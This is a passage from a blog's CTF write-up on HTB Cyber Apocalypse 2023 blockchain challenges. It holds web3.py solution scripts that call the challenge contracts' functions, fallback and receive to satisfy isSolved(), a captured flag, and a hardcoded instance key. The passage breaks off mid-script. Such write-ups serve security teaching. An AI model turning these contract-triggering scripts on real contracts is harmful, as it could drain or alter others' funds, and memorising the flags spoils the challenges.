blockchain | BKISC Blogshttps://bkisc-blog.netlify.app/tag/blockchain/blockchainWowchemy (https://wowchemy.com)en-usMon, 27 Mar 2023 00:00:00 +0000https://bkisc-blog.netlify.app/media/logo_huc55a0313517dd04bda48a4ace4db28bc_511389_300x300_fit_lanczos_3.pngblockchainhttps://bkisc-blog.netlify.app/tag/blockchain/Cyber Apocalypse 2023: The Cursed Mission - Blockchainhttps://bkisc-blog.netlify.app/blog/bkisc/htb2023-bc/Mon, 27 Mar 2023 00:00:00 +0000https://bkisc-blog.netlify.app/blog/bkisc/htb2023-bc/<p> <ul class="tags-list"> <a href="https://bkisc-blog.netlify.app/tag/ctf/">ctf</a> <a href="https://bkisc-blog.netlify.app/tag/writeup/">writeup</a> <a href="https://bkisc-blog.netlify.app/tag/blockchain/">blockchain</a> <a href="https://bkisc-blog.netlify.app/tag/htb-2023/">htb-2023</a> </ul> <details class="toc-inpage d-print-none " open> <summary class="font-weight-bold">Table of Contents</summary> <nav id="TableOfContents"> <ul> <li><a href="#navigating-the-unknown">Navigating the Unknown</a></li> <li><a href="#shooting-101">Shooting 101</a></li> <li><a href="#the-art-of-deception">The Art Of Deception</a></li> </ul> </nav> </details> </p> <h2 id="navigating-the-unknown">Navigating the Unknown</h2> <ul> <li> <p><strong>Given zip:</strong> <a href="https://drive.google.com/drive/folders/1c1hzJIa3CYmJ04it6Ox9a0svpxJZj2JX?usp=share_link" target="_blank" rel="noopener">Get it here!</a></p> </li> <li> <p><strong>Description:</strong> Your advanced sensory systems make it easy for you to navigate familiar environments, but you must rely on intuition to navigate in unknown territories. Through practice and training, you must learn to read subtle cues and become comfortable in unpredictable situations. Can you use your software to find your way through the blocks?</p> </li> <li> <p><strong>Note:</strong> This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.</p> </li> <li> <p><strong>Category:</strong> Blockchain</p> </li> <li> <p><strong>Difficulty:</strong> Very Easy</p> </li> </ul> <p>In this blockchain challenge, we were provided with two smart contracts: <code>Setup.sol</code> and <code>Unknown.sol</code>. Our goal was to solve the challenge by interacting with the contracts and ensuring that the <code>isSolved()</code> function in the Setup contract returns <code>true</code>.</p> <p>The <code>Setup.sol</code> contract is responsible for initializing the challenge and providing us with the necessary information to interact with the <code>Unknown.sol</code> contract. The Setup contract deploys an instance of the Unknown contract and exposes the <code>isSolved()</code> function, which checks if the updated variable in the Unknown contract is set to true.</p> <p>The <code>Unknown.sol</code> contract contains a single function, <code>updateSensors(uint256 version)</code>, which sets the updated variable to true if the provided version argument is equal to <code>10</code>.</p> <p>To solve the challenge, we needed to call the updateSensors function in the Unknown contract with the correct version <code>10</code>. To do this, we used the <code>web3.py</code> library to interact with the blockchain and the smart contracts. This is the python script:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">eth_account</span> </span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">web3</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">web3</span> <span class="kn">import</span> <span class="n">Web3</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">PRIVATE_KEY</span><span class="o">=</span> <span class="s2">&#34;REPLACE_YOUR_PRIVATE_KEY_HERE&#34;</span> </span></span><span class="line"><span class="cl"><span class="n">RPC_URL</span><span class="o">=</span><span class="s2">&#34;http://REPLACE_YOUR_RPC_URL_HERE&#34;</span> </span></span><span class="line"><span class="cl"><span class="n">SET_UP_ADRESSS</span><span class="o">=</span><span class="s2">&#34;REPLACE_YOUR_SET_UP_ADRESS_HERE&#34;</span> </span></span><span class="line"><span class="cl"><span class="n">UNKNOWN_ADRESSS</span><span class="o">=</span><span class="s2">&#34;REPLACE_YOUR_UNKNOWN_ADRESS_HERE&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">w3</span><span class="o">=</span><span class="n">Web3</span><span class="p">(</span><span class="n">web3</span><span class="o">.</span><span class="n">HTTPProvider</span><span class="p">(</span><span class="n">RPC_URL</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">my_account</span><span class="o">=</span><span class="n">eth_account</span><span class="o">.</span><span class="n">Account</span><span class="o">.</span><span class="n">from_key</span><span class="p">(</span><span class="n">PRIVATE_KEY</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">SET_UP_ABI</span> <span class="o">=</span> <span class="p">[</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;inputs&#34;</span><span class="p">:</span> <span class="p">[],</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;stateMutability&#34;</span><span class="p">:</span> <span class="s2">&#34;nonpayable&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;type&#34;</span><span class="p">:</span> <span class="s2">&#34;constructor&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">},</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;inputs&#34;</span><span class="p">:</span> <span class="p">[],</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;name&#34;</span><span class="p">:</span> <span class="s2">&#34;TARGET&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;outputs&#34;</span><span class="p">:</span> <span class="p">[</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;internalType&#34;</span><span class="p">:</span> <span class="s2">&#34;contract Unknown&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;name&#34;</span><span class="p">:</span> <span class="s2">&#34;&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;type&#34;</span><span class="p">:</span> <span class="s2">&#34;address&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">],</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;stateMutability&#34;</span><span class="p">:</span> <span class="s2">&#34;view&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;type&#34;</span><span class="p">:</span> <span class="s2">&#34;function&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">},</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;inputs&#34;</span><span class="p">:</span> <span class="p">[],</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;name&#34;</span><span class="p">:</span> <span class="s2">&#34;isSolved&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;outputs&#34;</span><span class="p">:</span> <span class="p">[</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;internalType&#34;</span><span class="p">:</span> <span class="s2">&#34;bool&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;name&#34;</span><span class="p">:</span> <span class="s2">&#34;&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;type&#34;</span><span class="p">:</span> <span class="s2">&#34;bool&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">],</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;stateMutability&#34;</span><span class="p">:</span> <span class="s2">&#34;view&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;type&#34;</span><span class="p">:</span> <span class="s2">&#34;function&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">]</span> </span></span><span class="line"><span class="cl"><span class="n">UNKNOWN_ABI</span> <span class="o">=</span> <span class="p">[</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;inputs&#34;</span><span class="p">:</span> <span class="p">[</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;internalType&#34;</span><span class="p">:</span> <span class="s2">&#34;uint256&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;name&#34;</span><span class="p">:</span> <span class="s2">&#34;version&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;type&#34;</span><span class="p">:</span> <span class="s2">&#34;uint256&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">],</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;name&#34;</span><span class="p">:</span> <span class="s2">&#34;updateSensors&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;outputs&#34;</span><span class="p">:</span> <span class="p">[],</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;stateMutability&#34;</span><span class="p">:</span> <span class="s2">&#34;nonpayable&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;type&#34;</span><span class="p">:</span> <span class="s2">&#34;function&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">},</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;inputs&#34;</span><span class="p">:</span> <span class="p">[],</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;name&#34;</span><span class="p">:</span> <span class="s2">&#34;updated&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;outputs&#34;</span><span class="p">:</span> <span class="p">[</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;internalType&#34;</span><span class="p">:</span> <span class="s2">&#34;bool&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;name&#34;</span><span class="p">:</span> <span class="s2">&#34;&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;type&#34;</span><span class="p">:</span> <span class="s2">&#34;bool&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">],</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;stateMutability&#34;</span><span class="p">:</span> <span class="s2">&#34;view&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;type&#34;</span><span class="p">:</span> <span class="s2">&#34;function&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">setup_contract</span><span class="o">=</span><span class="n">w3</span><span class="o">.</span><span class="n">eth</span><span class="o">.</span><span class="n">contract</span><span class="p">(</span><span class="n">address</span><span class="o">=</span><span class="n">SET_UP_ADRESSS</span><span class="p">,</span><span class="n">abi</span><span class="o">=</span><span class="n">SET_UP_ABI</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">unknown_contract</span><span class="o">=</span><span class="n">w3</span><span class="o">.</span><span class="n">eth</span><span class="o">.</span><span class="n">contract</span><span class="p">(</span><span class="n">address</span><span class="o">=</span><span class="n">UNKNOWN_ADRESSS</span><span class="p">,</span><span class="n">abi</span><span class="o">=</span><span class="n">UNKNOWN_ABI</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">transaction</span> <span class="o">=</span> <span class="n">unknown_contract</span><span class="o">.</span><span class="n">functions</span><span class="o">.</span><span class="n">updateSensors</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span><span class="o">.</span><span class="n">build_transaction</span><span class="p">({</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;from&#39;</span><span class="p">:</span> <span class="n">my_account</span><span class="o">.</span><span class="n">address</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;value&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;gas&#39;</span><span class="p">:</span> <span class="mi">300000</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;gasPrice&#39;</span><span class="p">:</span> <span class="n">w3</span><span class="o">.</span><span class="n">to_wei</span><span class="p">(</span><span class="s1">&#39;10&#39;</span><span class="p">,</span><span class="s1">&#39;gwei&#39;</span><span class="p">),</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;nonce&#39;</span><span class="p">:</span><span class="n">w3</span><span class="o">.</span><span class="n">eth</span><span class="o">.</span><span class="n">get_transaction_count</span><span class="p">(</span><span class="n">my_account</span><span class="o">.</span><span class="n">address</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">})</span> </span></span><span class="line"><span class="cl"><span class="n">signed_transaction</span><span class="o">=</span><span class="n">w3</span><span class="o">.</span><span class="n">eth</span><span class="o">.</span><span class="n">account</span><span class="o">.</span><span class="n">sign_transaction</span><span class="p">(</span><span class="n">transaction</span><span class="p">,</span><span class="n">PRIVATE_KEY</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">transaction_hash</span><span class="o">=</span><span class="n">w3</span><span class="o">.</span><span class="n">eth</span><span class="o">.</span><span class="n">send_raw_transaction</span><span class="p">(</span><span class="n">signed_transaction</span><span class="o">.</span><span class="n">rawTransaction</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">transaction_receipt</span><span class="o">=</span><span class="n">w3</span><span class="o">.</span><span class="n">eth</span><span class="o">.</span><span class="n">wait_for_transaction_receipt</span><span class="p">(</span><span class="n">transaction_hash</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">isSolve</span> <span class="o">=</span> <span class="n">setup_contract</span><span class="o">.</span><span class="n">functions</span><span class="o">.</span><span class="n">isSolved</span><span class="p">()</span><span class="o">.</span><span class="n">call</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="s2">&#34;Challenge solved:&#34;</span> <span class="o">+</span> <span class="p">{</span><span class="n">isSolve</span><span class="p">})</span> </span></span></code></pre></div><p>You can get both SET_UP_ABI and UNKNOWN_ABI by using <a href="https://remix.ethereum.org" target="_blank" rel="noopener">Remix IDE</a> to compile the contracts and get the ABIs. After running the script and we got the flag.</p> <img src="Solved1.png" alt="Solved" width="1000"/> <p>Flag is: <strong>HTB{9P5_50FtW4R3_UPd4t3D}</strong></p> <h2 id="shooting-101">Shooting 101</h2> <ul> <li> <p><strong>Given zip:</strong> <a href="https://drive.google.com/drive/folders/1xT9d1NQPWw5coVwSezV8FBHyyn31QE1c?usp=share_link" target="_blank" rel="noopener">Get it here!</a></p> </li> <li> <p><strong>Description:</strong> Your metallic body might have advanced targeting systems, but hitting a target is not just about technical proficiency. To truly master the art of targeting, you must learn to trust your instincts and develop a keen sense of intuition. During this training, you will emerge as a skilled marksman who can hit the targets with deadly precision. It&rsquo;s about time to train and prove yourself in the Shooting Area, can you make it?</p> </li> <li> <p><strong>Note:</strong> This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.</p> </li> <li> <p><strong>Category:</strong> Blockchain</p> </li> <li> <p><strong>Difficulty:</strong> Very Easy</p> </li> </ul> <p>In the Shooting 101 blockchain challenge, we have two smart contracts: <code>Setup</code> and <code>ShootingArea</code>. The goal of this challenge is to set the three boolean variables <code>firstShot</code>, <code>secondShot</code>, and <code>thirdShot</code> in the <code>ShootingArea</code> contract to <code>true</code>. The contract has a few functions with specific modifiers that ensure they can only be called under certain conditions.</p> <p>To solve the challenge, we need to interact with the contracts and call the functions in the correct order:</p> <ol> <li> <p>Call the fallback function of the ShootingArea contract by sending a transaction with 32 bytes of zero data, setting firstShot to true.</p> </li> <li> <p>Call the receive function of the ShootingArea contract by sending a transaction with a non-zero amount of Ether and an empty data field, setting secondShot to true.</p> </li> <li> <p>Call the <code>third()</code> function of the ShootingArea contract to set thirdShot to true. Note that we might need to call this function multiple times to ensure it sets the variable to true.</p> </li> <li> <p>Finally, call the <code>isSolved()</code> function in the Setup contract to verify if the challenge is solved.</p> </li> </ol> <p>The provided Python script uses the <code>web3.py</code> library to interact with the Ethereum contracts:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">web3</span> <span class="kn">import</span> <span class="n">Web3</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># Replace the following values with the ones from the challenge</span> </span></span><span class="line"><span class="cl"><span class="n">RPC_URL</span> <span class="o">=</span> <span class="s2">&#34;http://165.232.98.69:32406&#34;</span> </span></span><span class="line"><span class="cl"><span class="n">PRIVATE_KEY</span> <span class="o">=</span> <span class="s2">&#34;0xc3416ed8c225000b2b46142b478717e88548165fd4ed3e6afeaf7e9dba27b0af&#34;</span> </span></span><span class="line"><span class="cl"><span class="n">SETUP_CONTRACT_ADDRESS</span> <span class="o">=</span> <span class="s2">&#34;0x671C8C0f14f48098419FD7E3a51123f8f35F5173&#34;</span> </span></span><span class="line"><span class="cl"><span class="n">TARGET_CONTRACT_ADDRESS</span> <span class="o">=</span> <span class="s2">&#34;0x544D171d157A7Ebe08C32d1C5e6EEfaaa4e4E889&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">w3</span> <span class="o">=</span> <span class="n">Web3</span><span class="p">(</span><span class="n">Web3</span><span class="o">.</span><span class="n">HTTPProvider</span><span class="p">(</span><span class="n">RPC_URL</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># Get your account from the provided private key</span> </span></span><span class="line"><span class="cl"><span class="n">my_account</span> <span class="o">=</span> <span class="n">w3</span><span class="o">.</span><span class="n">eth</span><span class="o">.</span><span class="n">account</span><span class="o">.</span><span class="n">from_key</span><span class="p">(</span><span class="n">PRIVATE_KEY</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># Setup contract ABI</span> </span></span><span class="line"><span class="cl"><span class="n">SETUP_CONTRACT_ABI</span> <span class="o">=</span> <span class="p">[</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;inputs&#34;</span><span class="p">:</span> <span class="p">[],</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;stateMutability&#34;</span><span class="p">:</span> <span class="s2">&#34;nonpayable&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;type&#34;</span><span class="p">:</span> <span class="s2">&#34;constructor&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">},</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;inputs&#34;</span><span class="p">:</span> <span class="p">[],</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;name&#34;</span><span class="p">:</span> <span class="s2">&#34;TARGET&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;outputs&#34;</span><span class="p">:</span> <span class="p">[</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;internalType&#34;</span><span class="p">:</span> <span class="s2">&#34;contract ShootingArea&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;name&#34;</span><span class="p">:</span> <span class="s2">&#34;&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;type&#34;</span><span class="p">:</span> <span class="s2">&#34;address&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">],</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;stateMutability&#34;</span><span class="p">:</span> <span class="s2">&#34;view&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;type&#34;</span><span class="p">:</span> <span class="s2">&#34;function&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">},</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;inputs&#34;</span><span class="p">:</span> <span class="p">[],</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;name&#34;</span><span class="p">:</span> <span class="s2">&#34;isSolved&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;outputs&#34;</span><span class="p">:</span> <span class="p">[</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;internalType&#34;</span><span class="p">:</span> <span class="s2">&#34;bool&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;name&#34;</span><span class="p">:</span> <span class="s2">&#34;&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;type&#34;</span><span class="p">:</span> <span class="s2">&#34;bool&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">],</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;stateMutability&#34;</span><span class="p">:</span> <span class="s2">&#34;view&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;type&#34;</span><span class="p">:</span> <span class="s2">&#34;function&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># Target contract ABI</span> </span></span><span class="line"><span class="cl"><span class="n">TARGET_CONTRACT_ABI</span> <span class="o">=</span> <span class="p">[</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;stateMutability&#34;</span><span class="p">:</span> <span class="s2">&#34;payable&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;type&#34;</span><span class="p">:</span> <span class="s2">&#34;fallback&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">},</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;inputs&#34;</span><span class="p">:</span> <span class="p">[],</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;name&#34;</span><span class="p">:</span> <span class="s2">&#34;firstShot&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;outputs&#34;</span><span class="p">:</span> <span class="p">[</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;internalType&#34;</span><span class="p">:</span> <span class="s2">&#34;bool&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;name&#34;</span><span class="p">:</span> <span class="s2">&#34;&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;type&#34;</span><span class="p">:</span> <span class="s2">&#34;bool&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">],</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;stateMutability&#34;</span><span class="p">:</span> <span class="s2">&#34;view&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;type&#34;</span><span class="p">:</span> <span class="s2">&#34;function&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">},</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;inputs&#34;</span><span class="p">:</span> <span class="p">[],</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;name&#34;</span><span class="p">:</span> <span class="s2">&#34;secondShot&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;outputs&#34;</span><span class="p">:</span> <span class="p">[</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;internalType&#34;</span><span class="p">:</span> <span class="s2">&#34;bool&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;name&#34;</span><span class="p">:</span> <span class="s2">&#34;&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;type&#34;</span><span class="p">:</span> <span class="s2">&#34;bool&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">],</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;stateMutability&#34;</span><span class="p">:</span> <span class="s2">&#34;view&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;type&#34;</span><span class="p">:</span> <span class="s2">&#34;function&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">},</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;inputs&#34;</span><span class="p">:</span> <span class="p">[],</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;name&#34;</span><span class="p">:</span> <span class="s2">&#34;third&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;outputs&#34;</span><span class="p">:</span> <span class="p">[],</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;stateMutability&#34;</span><span class="p">:</span> <span class="s2">&#34;nonpayable&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;type&#34;</span><span class="p">:</span> <span class="s2">&#34;function&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">},</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;inputs&#34;</span><span class="p">:</span> <span class="p">[],</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;name&#34;</span><span class="p">:</span> <span class="s2">&#34;thirdShot&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;outputs&#34;</span><span class="p">:</span> <span class="p">[</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;internalType&#34;</span><span class="p">:</span> <span class="s2">&#34;bool&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;name&#34;</span><span class="p">:</span> <span class="s2">&#34;&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;type&#34;</span><span class="p">:</span> <span class="s2">&#34;bool&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">],</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;stateMutability&#34;</span><span class="p">:</span> <span class="s2">&#34;view&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;type&#34;</span><span class="p">:</span> <span class="s2">&#34;function&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">},</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;stateMutability&#34;</span><span class="p">:</span> <span class="s2">&#34;payable&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;type&#34;</span><span class="p">:</span> <span class="s2">&#34;receive&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># Create contract instances</span> </span></span><span class="line"><span class="cl"><span class="n">setup_contract</span> <span class="o">=</span> <span class="n">w3</span><span class="o">.</span><span class="n">eth</span><span class="o">.</span><span class="n">contract</span><span class="p">(</span><span class="n">address</span><span class="o">=</span><span class="n">SETUP_CONTRACT_ADDRESS</span><span class="p">,</span> <span class="n">abi</span><span class="o">=</span><span class="n">SETUP_CONTRACT_ABI</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">target_contract</span> <span class="o">=</span> <span class="n">w3</span><span class="o">.</span><span class="n">eth</span><span class="o">.</span><span class="n">contract</span><span class="p">(</span><span class="n">address</span><span class="o">=</span><span class="n">TARGET_CONTRACT_ADDRESS</span><span class="p">,</span> <span class="n">abi</span><span class="o">=</span><span class="n">TARGET_CONTRACT_ABI</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">print_status</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">first_shot_status</span> <span class="o">=</span> <span class="n">target_contract</span><span class="o">.</span><span class="n">functions</span><span class="o">.</span><span class="n">firstShot</span><span class="p">()</span><span class="o">.</span><span class="n">call</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">second_shot_status</span> <span class="o">=</span> <span class="n">target_contract</span><span class="o">.</span><span class="n">functions</span><span class="o">.</span><span class="n">secondShot</span><span class="p">()</span><span class="o">.</span><span class="n">call</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">third_shot_status</span> <span class="o">=</span> <span class="n">target_contract</span><span class="o">.</span><span class="n">functions</span><span class="o">.</span><span class="n">thirdShot</span><span class="p">()</span><span class="o">.</span><span class="n">call</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span 